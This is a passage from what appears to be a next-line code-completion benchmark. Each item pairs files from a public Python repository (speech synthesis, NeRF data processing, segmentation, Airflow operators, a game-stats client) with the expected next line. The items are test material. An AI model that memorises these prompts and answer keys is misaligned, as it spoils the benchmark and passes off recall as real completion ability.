authorization != f"Bearer {expected_api_key}"): raise HTTPException(status_code=401, detail="Unauthorized") def verify_admin_key(authorization: str = Header(None)) -> None: expected_api_key = shared.args.admin_key if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"): raise HTTPException(status_code=401, detail="Unauthorized") app = FastAPI() check_key = [Depends(verify_api_key)] check_admin_key = [Depends(verify_admin_key)] # Configure CORS settings to allow all origins, methods, and headers app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"] ) @app.options("/", dependencies=check_key) async def options_route(): return JSONResponse(content="OK") @app.post('/v1/completions', response_model=CompletionResponse, dependencies=check_key) async def openai_completions(request: Request, request_data: CompletionRequest): path = request.url.path is_legacy = "/generate" in path if request_data.stream: async def generator(): async with streaming_semaphore: response = OAIcompletions.stream_completions(to_dict(request_data), is_legacy=is_legacy) for resp in response: disconnected = await request.is_disconnected() if disconnected: break yield {"data": json.dumps(resp)} return EventSourceResponse(generator()) # SSE streaming else: response = OAIcompletions.completions(to_dict(request_data), is_legacy=is_legacy) return JSONResponse(response)
@app.post('/v1/chat/completions', response_model=ChatCompletionResponse, dependencies=check_key)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: foocker/Bert-VITS2-Faster # Path: infer_.py def get_net_g(model_path: str, version: str, device: str, hps): def get_text(text, language_str, hps, device): def infer( text, sdp_ratio, noise_scale, noise_scale_w, length_scale, language, sid, hps, net_g, device, skip_start=False, skip_end=False, g_model_name=None ): # Path: config.py class Resample_config: class Preprocess_text_config: class Bert_gen_config: class Emo_gen_config: class Train_ms_config: class Webui_config: class Server_config: class Translate_config: class Config: def __init__(self, in_dir: str, out_dir: str, sampling_rate: int = 44100): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, transcription_path: str, cleaned_path: str, train_path: str, val_path: str, config_path: str, val_per_spk: int = 5, max_val_total: int = 10000, clean: bool = True, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, num_processes: int = 2, device: str = "cuda", use_multi_device: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, num_processes: int = 2, device: str = "cuda", ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, config_path: str, env: Dict[str, any], base: Dict[str, any], model: str, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, device: str, model: str, config_path: str, language_identification_library: str, port: int = 7860, share: bool = False, debug: bool = False, ): def from_dict(cls, dataset_path: str, data: Dict[str, any]): def __init__( self, models: List[Dict[str, any]], port: int = 5000, device: str = "cuda" ): def from_dict(cls, data: Dict[str, any]): def __init__(self, app_key: str, secret_key: str): def from_dict(cls, data: Dict[str, any]): def __init__(self, config_path: str): # Path: infer_torch_export_onnx.py import os import logging import re_matching import torch import utils import gradio as gr import numpy as np import time from infer_ import infer, latest_version, get_net_g from config import config from scipy.io.wavfile import write logging.basicConfig( level=logging.INFO, format="| %(name)s | %(levelname)s | %(message)s" ) logger = logging.getLogger(__name__) net_g = None device = config.webui_config.device if device == "mps": os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1" def generate_audio( slices, sdp_ratio, noise_scale, noise_scale_w, length_scale, speaker, language, skip_start=False, skip_end=False, ): audio_list = [] # silence = np.zeros(hps.data.sampling_rate // 2, dtype=np.int16) with torch.no_grad(): for idx, piece in enumerate(slices): skip_start = (idx != 0) and skip_start skip_end = (idx != len(slices) - 1) and skip_end
audio = infer(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: sinoyou/nelf-pro # Path: nerfstudio/utils/rich_utils.py def status(msg: str, spinner: str = "bouncingBall", verbose: bool = False): """A context manager that does nothing is verbose is True. Otherwise it hides logs under a message. Args: msg: The message to log. spinner: The spinner to use. verbose: If True, print all logs, else hide them. """ if verbose: return nullcontext() return CONSOLE.status(msg, spinner=spinner) # Path: nerfstudio/utils/scripts.py def run_command(cmd: str, verbose=False) -> Optional[str]: """Runs a command and returns the output. Args: cmd: Command to run. verbose: If True, logs the output of the command. Returns: The output of the command if return_output is True, otherwise None. """ out = subprocess.run(cmd, capture_output=not verbose, shell=True, check=False) if out.returncode != 0: CONSOLE.rule("[bold red] :skull: :skull: :skull: ERROR :skull: :skull: :skull: ", style="red") CONSOLE.print(f"[bold red]Error running command: {cmd}") CONSOLE.rule(style="red") CONSOLE.print(out.stderr.decode("utf-8")) sys.exit(1) if out.stdout is not None: return out.stdout.decode("utf-8") return out # Path: nerfstudio/process_data/process_data_utils.py import shutil import sys from enum import Enum from pathlib import Path from typing import List, Optional, Tuple from rich.console import Console from typing_extensions import Literal from nerfstudio.utils.rich_utils import status from nerfstudio.utils.scripts import run_command # Copyright 2022 The Nerfstudio Team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Helper utils for processing data into the nerfstudio format.""" CONSOLE = Console(width=120) class CameraModel(Enum): """Enum for camera types.""" OPENCV = "OPENCV" OPENCV_FISHEYE = "OPENCV_FISHEYE" CAMERA_MODELS = { "perspective": CameraModel.OPENCV, "fisheye": CameraModel.OPENCV_FISHEYE, } def get_num_frames_in_video(video: Path) -> int: """Returns the number of frames in a video. Args: video: Path to a video. Returns: The number of frames in a video. """ cmd = f"ffprobe -v error -select_streams v:0 -count_packets \ -show_entries stream=nb_read_packets -of csv=p=0 {video}" output = run_command(cmd) assert output is not None output = output.strip(" ,\t\n\r") return int(output) def convert_video_to_images( video_path: Path, image_dir: Path, num_frames_target: int, verbose: bool = False ) -> Tuple[List[str], int]: """Converts a video into a sequence of images. Args: video_path: Path to the video. output_dir: Path to the output directory. num_frames_target: Number of frames to extract. verbose: If True, logs the output of the command. Returns: A tuple containing summary of the conversion and the number of extracted frames. """
with status(msg="Converting video to images...", spinner="bouncingBall", verbose=verbose):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: wuc9521/rep-flow # Path: utils/loader.py def read_keywords_from_file(file_path, app: Flask = None): try: with open(file_path, 'r') as file: content = file.read() keywords_list = [keyword.strip() for keyword in re.split(',|\n', content) if keyword.strip()] app.logger.info(f"Keywords loaded: {keywords_list}") return keywords_list except FileNotFoundError: app.logger.info(f"Error: File '{file_path}' not found.") return [] # Path: utils/hints.py HELP = get_HELP_HINT() # Path: utils/hints.py def get_NUMBER_EMBD_HINT(id): return f""" <ul class="hint-font" onclick='handleHintClick(event)' style="list-style-type: none;"> <li><span>Monitoring Screen...</span></li> <li><span>Test:</span><span class='u-like'> [{id}] </span><span>launching...</span></li> <li><span>Test:</span><span class='u-like'> [{id}] </span><span>launched...</span></li> </ul> """ # Path: utils/hints.py def get_CURRENT_STATE_HINT(id): return \ f""" <ul class="hint-font" onclick='handleHintClick(event)' style="list-style-type: none;"> <li><span>Monitoring Screen...</span></li> <li><span>Test:</span><span class='u-like'> [{id}] </span><span>ongoing...</span></li> </ul> """ if int(id) >= 0 else \ f""" <ul class="hint-font" onclick='handleHintClick(event)' style="list-style-type: none;"> <li><span>Monitoring Screen...</span></li> <li><span>No test launched</span></li> </ul> """ # Path: utils/hints.py def get_NEXT_STEP_HINT(id): return \ f""" <ul class="hint-font" onclick='handleHintClick(event)' style="list-style-type: none;"> <li><span>Monitoring Screen...</span></li> <li><span>Test:</span><span class='u-like'> [{id}] </span><span>ongoing...</span></li> </ul> """ # Path: utils/test.py def extract_and_validate_test_number(query_text, app): """ refer to: https://regex101.com/r/x609CD/1 """ match = re.match(r'\/?test (\d+)$', query_text) app.logger.info(f"query_text: {query_text}") if match: test_number = match.group(1) if test_number.isdigit(): return test_number return None # Path: utils/log.py def log_(logger, level, message): cf = inspect.currentframe() caller_frame = cf.f_back caller_info = inspect.getframeinfo(caller_frame) log_message = f"{caller_info.filename}:{caller_info.lineno} - {message}" if level == 'info': logger.info(log_message) elif level == 'error': logger.error(log_message) elif level == 'warning': logger.warning(log_message) elif level == 'debug': logger.debug(log_message) else: raise ValueError(f"Unsupported log level: {level}") # Path: utils/file.py def get_i(id, i): LIST_DIR = os.path.join(os.path.dirname(__file__), '../data/list') i = int(i) try: with open(os.path.join(LIST_DIR, str(id)+'.json'),'r') as f: data = json.load(f) if 0 <= i < len(data): return data[i]['guidance']+'.png', i==len(data)-1 else: return f"Index {i} is out of range." except Exception as e: return str(e) # Path: model/common.py TEST_DIR = [] DATA_DIR = os.path.join(os.path.dirname(__file__), '../data') LIST_DIR = os.path.join(DATA_DIR, 'list') # Path: model/process.py def image_process(image_user_path, image_list, app=None): """ img_user_path: absolute path of user image img_list: list of guidance img """ print(TEST_DIR) image_user = io.imread(image_user_path) max_score = 0 max_similar = 0 for i in range(len(image_list)): if app: app.logger.info(f"Calculating Similarity: image {i}") score = classify_hist_with_split(image_user, image_list[i]) if score > max_score: max_score = score max_similar = i if max_score < 0.7: return None return max_similar, max_score # Path: app.py import os import spacy import logging import pandas as pd from logging.handlers import RotatingFileHandler from flask import Flask, render_template, request, jsonify, send_from_directory from flask_cors import cross_origin from utils.loader import read_keywords_from_file from utils.hints import HELP, get_NUMBER_EMBD_HINT, get_CURRENT_STATE_HINT, get_NEXT_STEP_HINT from utils.test import extract_and_validate_test_number from utils.log import log_ from utils.file import get_i from model.common import imgs from model.process import image_process DEFAULT_RESPONSE_FLAG = "*" NUMBER_EMBD_HINT = None CURRENT_BUG_ID = -1 # Load spaCy English model nlp = spacy.load("en_core_web_sm") app = Flask(__name__, template_folder='') # Configure LOG_DIR = os.path.join(app.root_path, 'log') DATA_DIR = os.path.join(app.root_path, 'data') MODEL_DIR = os.path.join(app.root_path, 'model') CORPUS_DIR = os.path.join(DATA_DIR, 'corpus') GUIDANCE_DIR = os.path.join(DATA_DIR, 'guidance') STATE_DIR = os.path.join(DATA_DIR, 'state') std = pd.read_csv(os.path.join(CORPUS_DIR, 'std.csv')) df = pd.merge( pd.read_csv(os.path.join(CORPUS_DIR, 'qa.csv')), std, on='ID', how='left' ) qa = dict(zip(df['Q'], df['A'])) at = dict(zip(std['A'], std['TYPE'])) ta = dict(zip(std['TYPE'], std['A']))
key_words = read_keywords_from_file(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: yash-srivastava19/verizon # Path: other_utils.py def kvlm_serialize(kvlm): ret = b'' for k in kvlm.keys(): if k == None: continue val = kvlm[k] if type(val) != list: val = [val] for v in val: ret += k + b' ' + (v.replace(b'\n ')) + b'\n' ret += b'\n' + kvlm[None] + b'\n' return ret # Path: other_utils.py def kvlm_parse(raw, start=0, dct=None): if not dct: dct = collections.OrderedDict() # We search for next space and the next line. If space appears before a newline, we have a keyword. Othewise, it's the final message, which we just read to the end of file. spc = raw.find(b' ', start) nl = raw.find(b'\n', start) # Base Case : if (spc<0) or (nl<spc): assert nl==start dct[None] = raw[start+1 :] return dct # Recursive Case : key = raw[start:spc] end = start # Find the end of the value. We loop until we find a '\n' followed by a space. while True: end = raw.find(b'\n', end+1) if raw[end+1] != ord(' '): break value = raw[spc+1: end].replace(b'\n ', b'\n') if key in dct: if type(dct[key]) == list: dct[key].append(value) else: dct[key] = [dct[key], value] else: dct[key] = value return kvlm_parse(raw, start=end+1, dct=dct) # Path: classes.py from class_utils import * from other_utils import kvlm_serialize, kvlm_parse class VerizonRepository: worktree = None vrzdir = None conf = None def __init__(self, path, force = False): self.worktree = path self.vrzdir = os.path.join(path, ".vrz") if not (force or os.path.isdir(self.vrzdir)): raise Exception(f"Not a Verizon Repository : {path}") # Read Config file. self.conf = configparser.ConfigParser() cf = repo_file(self, "config") if cf and os.path.exists(cf): self.conf.read([cf]) elif not force: raise Exception("Configuration File is Missing") if not force: vers = int(self.conf.get("core", "repositoryformatversion")) if vers != 0: raise Exception(f"Unsupported repositoryformatversion : {vers}") class VerizonObject: def __init__(self, data=None) -> None: if data != None: self.deserialize(data) else: self.init() def serialize(self, repo): """ Read the objects contents, and do whatever it takes to convert it into a meaningful representation. """ raise NotImplementedError def deserialize(self, data): raise NotImplementedError def init(self): pass # Tree wrapper for a single record(a single path). class VerizonTreeLeaf: def __init__(self, mode, path, sha) -> None: self.mode = mode self.path = path self.sha = sha ## Type Header could be one of `blob`, `commit`, `tag`, `tree`. # Blobs are user data. The content of every file we put in git is stored as a blob. class VerizonBlob(VerizonObject): fmt = b'blob' def serialize(self): return self.blobdata def deserialize(self, data): self.blobdata = data class VerizonCommit(VerizonObject): fmt = b'commit' def deserialize(self, data): self.kvlm = kvlm_parse(data) def serialize(self, repo):
return kvlm_serialize(self.kvlm)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: amazon-science/c2f-seg # Path: data/dataloader_transformer.py def load_dataset(config, args, mode): if mode=="train": if args.dataset=="KINS": train_dataset = Kins_Fusion_dataset(config, mode='train') test_dataset = Kins_Fusion_dataset(config, mode='test') elif args.dataset=="COCOA": train_dataset = COCOA_Fusion_dataset(config, mode='train') test_dataset = COCOA_Fusion_dataset(config, mode='test') elif args.dataset=="Fishbowl": train_dataset = FishBowl(config, mode='train') test_dataset = FishBowl(config, mode='test') elif args.dataset=="MOViD_A": train_dataset = MOViD_A(config, mode='train') test_dataset = MOViD_A(config, mode='test') return train_dataset, test_dataset else: if args.dataset=="KINS": test_dataset = KINS_Aisformer_VRSP_Intersection(config, mode='test') elif args.dataset=="COCOA": test_dataset = COCOA_Fusion_dataset(config, mode='test') elif args.dataset=="Fishbowl": test_dataset = FishBowl(config, mode='test') elif args.dataset=="MOViD_A": test_dataset = MOViD_A(config, mode='test') return test_dataset # Path: utils/logger.py def setup_logger(work_dir=None, logfile_name='log.txt', logger_name='log'): """Sets up logger from target work directory. The function will sets up a logger with `DEBUG` log level. Two handlers will be added to the logger automatically. One is the `sys.stdout` stream, with `INFO` log level, which will print improtant messages on the screen. The other is used to save all messages to file `$WORK_DIR/$LOGFILE_NAME`. Messages will be added time stamp and log level before logged. NOTE: If `work_dir` or `logfile_name` is empty, the file stream will be skipped. Args: work_dir: The work directory. All intermediate files will be saved here. (default: None) logfile_name: Name of the file to save log message. (default: `log.txt`) logger_name: Unique name for the logger. (default: `logger`) Returns: A `logging.Logger` object. Raises: SystemExit: If the work directory has already existed, of the logger with specified name `logger_name` has already existed. """ logger = logging.getLogger(logger_name) formatter = logging.Formatter("[%(asctime)s][%(levelname)s] %(message)s") if not logger.handlers: logger.setLevel(logging.DEBUG) # Print log message with `INFO` level or above onto the screen. sh = logging.StreamHandler(stream=sys.stdout) # sh.setLevel(logging.INFO) sh.setLevel(logging.INFO) sh.setFormatter(formatter) logger.addHandler(sh) logger.propagate = False if not work_dir or not logfile_name: return logger if os.path.exists(work_dir): print(f'Work directory `{work_dir}` has already existed!') os.makedirs(work_dir, exist_ok=True) # Save log message with all levels in log file. fh = logging.FileHandler(os.path.join(work_dir, logfile_name)) fh.setLevel(logging.DEBUG) fh.setFormatter(formatter) logger.addHandler(fh) return logger # Path: utils/utils.py class Config(object): def __init__(self, config_path): with open(config_path, 'r') as f: self._yaml = f.read() self._dict = yaml.load(self._yaml, Loader=yaml.SafeLoader) self._dict['path'] = os.path.dirname(config_path) def __getattr__(self, name): if self._dict.get(name) is not None: return self._dict[name] return None def print(self): print('Model configurations:') print('---------------------------------') print(self._yaml) print('') print('---------------------------------') print('') # Path: utils/utils.py def to_cuda(meta, device): for k in meta: if meta[k] is not None: meta[k] = meta[k].to(device) return meta # Path: test_c2f_seg.py import os import cv2 import time import random import argparse import numpy as np import torch import torch.distributed as dist from tqdm import tqdm from shutil import copyfile from torch.utils.data import DataLoader from data.dataloader_transformer import load_dataset from utils.logger import setup_logger from utils.utils import Config, to_cuda from src.image_model import C2F_Seg from src.video_model import C2F_Seg if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--seed', type=int, default=42) # path parser.add_argument('--path', type=str, required=True, help='model checkpoints path') parser.add_argument('--check_point_path', type=str, default="../check_points", ) parser.add_argument('--vq_path', type=str, required=True, default='KINS_vqgan') # dataset parser.add_argument('--dataset', type=str, default="MOViD_A", help = "select dataset") parser.add_argument('--data_type', type=str, default="image", help = "select image or video model") parser.add_argument('--batch', type=int, default=1) parser.add_argument("--local_rank", default=-1, type=int, help="node rank for distributed training") args = parser.parse_args() if args.data_type=="image": elif args.data_type=="video": dist.init_process_group(backend="nccl") torch.cuda.set_device(args.local_rank) rank = dist.get_rank() args.path = os.path.join(args.check_point_path, args.path) vq_model_path = os.path.join(args.check_point_path, args.vq_path) os.makedirs(args.path, exist_ok=True) config_path = os.path.join(args.path, 'c2f_seg_{}.yml'.format(args.dataset)) # copy config template if does't exist if not os.path.exists(config_path): copyfile('./configs/c2f_seg_{}.yml'.format(args.dataset), config_path) # load config file config = Config(config_path) config.path = args.path config.batch_size = args.batch config.dataset = args.dataset log_file = 'log-{}.txt'.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
logger = setup_logger(os.path.join(args.path, 'logs'), logfile_name=log_file)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Hammour-steak/GOUB # Path: codes/models/modules/module_util.py class SinusoidalPosEmb(nn.Module): def __init__(self, dim): super().__init__() self.dim = dim def forward(self, x): device = x.device half_dim = self.dim // 2 emb = math.log(10000) / (half_dim - 1) emb = torch.exp(torch.arange(half_dim, device=device) * -emb) emb = x[:, None] * emb[None, :] emb = torch.cat((emb.sin(), emb.cos()), dim=-1) return emb # Path: codes/models/modules/module_util.py class LayerNorm(nn.Module): def __init__(self, dim): super().__init__() self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) def forward(self, x): eps = 1e-5 if x.dtype == torch.float32 else 1e-3 var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) * (var + eps).rsqrt() * self.g # Path: codes/models/modules/module_util.py def exists(x): return x is not None # Path: codes/models/modules/DenoisingNAFNet_arch.py import torch import torch.nn as nn import torch.nn.functional as F from einops import rearrange, reduce from .module_util import SinusoidalPosEmb, LayerNorm, exists class SimpleGate(nn.Module): def forward(self, x): x1, x2 = x.chunk(2, dim=1) return x1 * x2 class NAFBlock(nn.Module): def __init__(self, c, time_emb_dim=None, DW_Expand=2, FFN_Expand=2, drop_out_rate=0.): super().__init__() self.mlp = nn.Sequential( SimpleGate(), nn.Linear(time_emb_dim // 2, c * 4) ) if time_emb_dim else None dw_channel = c * DW_Expand self.conv1 = nn.Conv2d(in_channels=c, out_channels=dw_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True) self.conv2 = nn.Conv2d(in_channels=dw_channel, out_channels=dw_channel, kernel_size=3, padding=1, stride=1, groups=dw_channel, bias=True) self.conv3 = nn.Conv2d(in_channels=dw_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True) # Simplified Channel Attention self.sca = nn.Sequential( nn.AdaptiveAvgPool2d(1), nn.Conv2d(in_channels=dw_channel // 2, out_channels=dw_channel // 2, kernel_size=1, padding=0, stride=1, groups=1, bias=True), ) # SimpleGate self.sg = SimpleGate() ffn_channel = FFN_Expand * c self.conv4 = nn.Conv2d(in_channels=c, out_channels=ffn_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True) self.conv5 = nn.Conv2d(in_channels=ffn_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.norm1 = LayerNorm(c)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: eldar-eln-bigabid/airflow-aerospike-provider # Path: aerospike_provider/operators/aerospike.py class AerospikeGetKeyOperator(BaseOperator): """ Read an existing record(s) metadata and all of its bins for a specified key. :param namespace: namespace to use in aerospike db :param set: set name in the namespace :param key: key to get and return. can be a single key or a list of keys :param policy: which policy the key should be saved with. default `POLICY_KEY_SEND` :param aerospike_conn_id: aerospike connection to use, defaults to 'aerospike_default' """ template_fields: Sequence[str] = ("key",) template_ext: Sequence[str] = () ui_color = "#66c3ff" def __init__( self, namespace: str, set: str, key: Union[List[str], str], policy: dict = {'key': aerospike.POLICY_KEY_SEND}, aerospike_conn_id: str = "aerospike_default", **kwargs: Any, ) -> None: super().__init__(**kwargs) self.key = key self.namespace = namespace self.set = set self.key = key self.policy = policy self.aerospike_conn_id = aerospike_conn_id def execute(self, context: Context) -> list: with AerospikeHook(self.aerospike_conn_id) as hook: self.log.info('Fetching key') records = hook.get_record(key=self.key, namespace=self.namespace, set=self.set, policy=self.policy) parsed_records = self.parse_records(records=records) self.log.info('Got %s records', len(parsed_records)) return parsed_records def parse_records(self, records: Union[List, tuple]) -> list: # Removing the `bytearray` object from records since object of type bytearray is not JSON serializable for Xcom. if isinstance(records, list): data = list(map(self.create_dict_from_record, records)) elif isinstance(records, tuple): data = [self.create_dict_from_record(record=records)] else: raise ValueError(f"Expecting 'list' or 'tuple', got: {type(records)}") return data @staticmethod def create_dict_from_record(record: tuple) -> dict: try: return { "namespace": record[0][0], "set": record[0][1], "key": record[0][2], "metadata": record[1], "bins": record[2] } except IndexError: # Handling an error when there are no 'bins' the data return { "namespace": record[0][0], "set": record[0][1], "key": record[0][2], "metadata": record[1] } # Path: aerospike_provider/operators/aerospike.py class AerospikePutKeyOperator(BaseOperator): """ Create a new record, add or remove bins. This can also remove a record (if exists) using ` `{"bin": aerospuke.null() }`` if it's the last bin. :param key: key to save in the db. :param namespace: namespace to use in aerospike db :param set: set name in the namespace :param bins: bins name and data saved along with a key as key values. For example: `{"bin": value}` :param metadata: metadata about the key eg. ttl. For example: `{"ttl": 0}` :param policy: which policy the key should be saved with. default `POLICY_EXISTS_IGNORE`. ref: https://developer.aerospike.com/client/usage/atomic/update#policies :param aerospike_conn_id: aerospike connection to use, defaults to 'aerospike_default' """ template_fields: Sequence[str] = ("key", "bins", "metadata", ) template_ext: Sequence[str] = () ui_color = "#66c3ff" def __init__( self, namespace: str, set: str, key: str, bins: dict, metadata: Union[dict, Any] = None, policy: Dict[str, Any] = {'key': aerospike.POLICY_EXISTS_IGNORE}, aerospike_conn_id: str = "aerospike_default", **kwargs: Any, ) -> None: super().__init__(**kwargs) self.key = key self.namespace = namespace self.set = set self.key = key self.bins = bins self.metadata = metadata self.policy = policy self.aerospike_conn_id = aerospike_conn_id def execute(self, context: Context) -> None: with AerospikeHook(self.aerospike_conn_id) as hook: self.log.info('Storing %s as key', self.key) hook.put(key=self.key, bins=self.bins, metadata=self.metadata, namespace=self.namespace, set=self.set, policy=self.policy) self.log.info('Stored key successfully') # Path: tests/operators/test_aerospike.py import unittest import aerospike from unittest.mock import patch, Mock from aerospike_provider.operators.aerospike import AerospikeGetKeyOperator, AerospikePutKeyOperator # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. class TestAerospikeGetKeyOperator(unittest.TestCase): def setUp(self): self.namespace = 'test_namespace' self.set = 'test_set' self.key = 'test_key' self.policy = { aerospike.POLICY_KEY_SEND } self.task_id = 'test_task' self.metadata = {'ttl': 1000, 'gen': 4} self.bins = {'name': 'Aerospike Test', 'version': "1.0.0"}
self.operator = AerospikeGetKeyOperator(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Its-Haze/league-rpc-linux # Path: league_rpc_linux/polling.py def wait_until_exists( url: str, custom_message: str = "", expected_response_code: int = 200, timeout: int = 30, n_sleep: float | int = 5, # Not needed, but good to have. n_total_amount: int = 20, startup: int = False, # Set to True on the first time it tries to poll the local api. (onGameStart) ) -> requests.Response | None: """ Polling on the local riot api until success is returned. """ for _ in range(n_total_amount): try: response = requests.get(url, timeout=timeout, verify=False) if response.status_code != expected_response_code: time.sleep(n_sleep) continue break except ( NewConnectionError, ConnectionError, requests.exceptions.ConnectionError, ): # These errors occur either before the api has started.. # Or when the game has ended if startup: # Make sure we continue to poll the api during the start of a game. time.sleep(n_sleep) continue # When game ends, we don't care about polling the api. return None else: print(custom_message) return None return response # Path: league_rpc_linux/username.py def get_summoner_name(with_discriminator: bool = False) -> str: """ Gets the current summoner name. if with_discriminator is True, the function will return a summoners name with #EUW / #EUNE etc Defaults to not include it. """ url = "https://127.0.0.1:2999/liveclientdata/activeplayername" if response := wait_until_exists( url=url, custom_message=""" Summoner name could not be found. Contact @haze.dev on discord, or submit a ticket on Github. """, ): name = str(response.json()) return name if with_discriminator else name.split("#", maxsplit=1)[0] return "" # Path: league_rpc_linux/kda.py import urllib3 from requests import Response from league_rpc_linux.polling import wait_until_exists from league_rpc_linux.username import get_summoner_name urllib3.disable_warnings() def get_kda() -> str: """ Get the current KDA of your game. """ response = get_current_user_stats() if isinstance(response, Response): parsed_data = response.json() kills = str(parsed_data["kills"]) deaths = str(parsed_data["deaths"]) assists = str(parsed_data["assists"]) return f"{kills}/{deaths}/{assists}" return "" def get_level() -> int: """ Get the current Level of your game. """ response = get_current_active_player_stats() if isinstance(response, Response): parsed_data = response.json() level = int(parsed_data["level"]) return level return 0 def get_gold() -> int: """ Get the current gold of your game. """ response = get_current_active_player_stats() if isinstance(response, Response): parsed_data = response.json() gold = int(parsed_data["currentGold"]) return gold return 0 def get_creepscore() -> str: """ Get the current creepScore of your live game creepScore is updated every 10cs by Riot. """ response = get_current_user_stats() if isinstance(response, Response): parsed_data = response.json() creep_score = str(parsed_data["creepScore"]) return f"{creep_score}cs" return "" def get_current_user_stats() -> Response | None: """ Request data from playerscores?summonerName and return the response. """
your_summoner_name = get_summoner_name()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: huahuahuage/Bert-VITS2-Speech # Path: log.py DISABLED_LOGGER = ["gradio.processing_utils", "gradio", "httpx"] # Path: config.py def read_config(config_path:str) -> dict: """ 取读配置文件 """ f = open(config_path, "rb") try: raw_data:str = f.read() # 检测配置文件编码 char_type = chardet.detect(raw_data)['encoding'] # 解码 data = raw_data.decode(char_type) config_data = json.loads(data) except: config_data = {} logging.error(f"配置文件 {config_path} 不存在或者格式错误。") f.close() return config_data # Path: config.py CONFIG_PATH = "config.json" def read_config(config_path:str) -> dict: def __init__(self) -> None: def get(self, key, default=None): class ONNX_CONFIG: # Path: onnx_infer/text/cleaner.py def clean_text(text: str, language: str): """ 处理标点符号,并将文本转化成对应语言音标? norm_text:处理标点后的文本 phones:所有文本的音标列表 tones:所有文本的音调 word2ph:单个字的音标个数 """ try: language_text_normalize = getattr(text_normalize_instance, language) except AttributeError: raise TypeError(f"语言类型输入错误:{language}。") # 替换所有阿拉伯数字为对应语言,同时将符号替换为指定列表内的英文符号 norm_text = language_text_normalize(text) phones, tones, word2ph = getattr(g2p_instance, language)(norm_text) return norm_text, phones, tones, word2ph # Path: onnx_infer/text/cleaner.py def cleaned_text_to_sequence(cleaned_text, tones, language): """Converts a string of text to a sequence of IDs corresponding to the symbols in the text. Args: text: string to convert to a sequence Returns: List of integers corresponding to the symbols in the text """ phones = [symbol_to_id[symbol] for symbol in cleaned_text] tone_start = language_tone_start_map[language] tones = [i + tone_start for i in tones] lang_ids = [language_id_map[language]] * len(phones) return phones, tones, lang_ids # Path: onnx_infer/onnx_infer.py import os import numpy as np import onnxruntime as ort from copy import copy from typing import List from dataclasses import dataclass from log import log_instance from config import read_config from config import config_instance from .text.cleaner import clean_text, cleaned_text_to_sequence from .onnx_bert import get_bert BERT_ENABLE = config_instance.get("bert_enable", True) if BERT_ENABLE: # 获取模型中包含的中文角色标记 CHINESE_CHARACTER_MARK = config_instance.get("onnx_tts_models_chinese_mark", "中文") ONNX_PROVIDERS = [config_instance.get("onnx_providers", "CPUExecutionProvider")] MODELS_PATH = os.path.abspath(config_instance.get("onnx_tts_models", "onnx/models")) MODELS_BASE_NAME = os.path.basename(MODELS_PATH) MODELS_PARENT_PATH = os.path.dirname(MODELS_PATH) MODELS_PREFIX = os.path.join(MODELS_PATH, os.path.basename(MODELS_PATH)) ONNX_MODELS_PATH = { "config": f"{MODELS_PARENT_PATH}/{MODELS_BASE_NAME}.json", "enc": f"{MODELS_PREFIX}_enc_p.onnx", "emb_g": f"{MODELS_PREFIX}_emb.onnx", 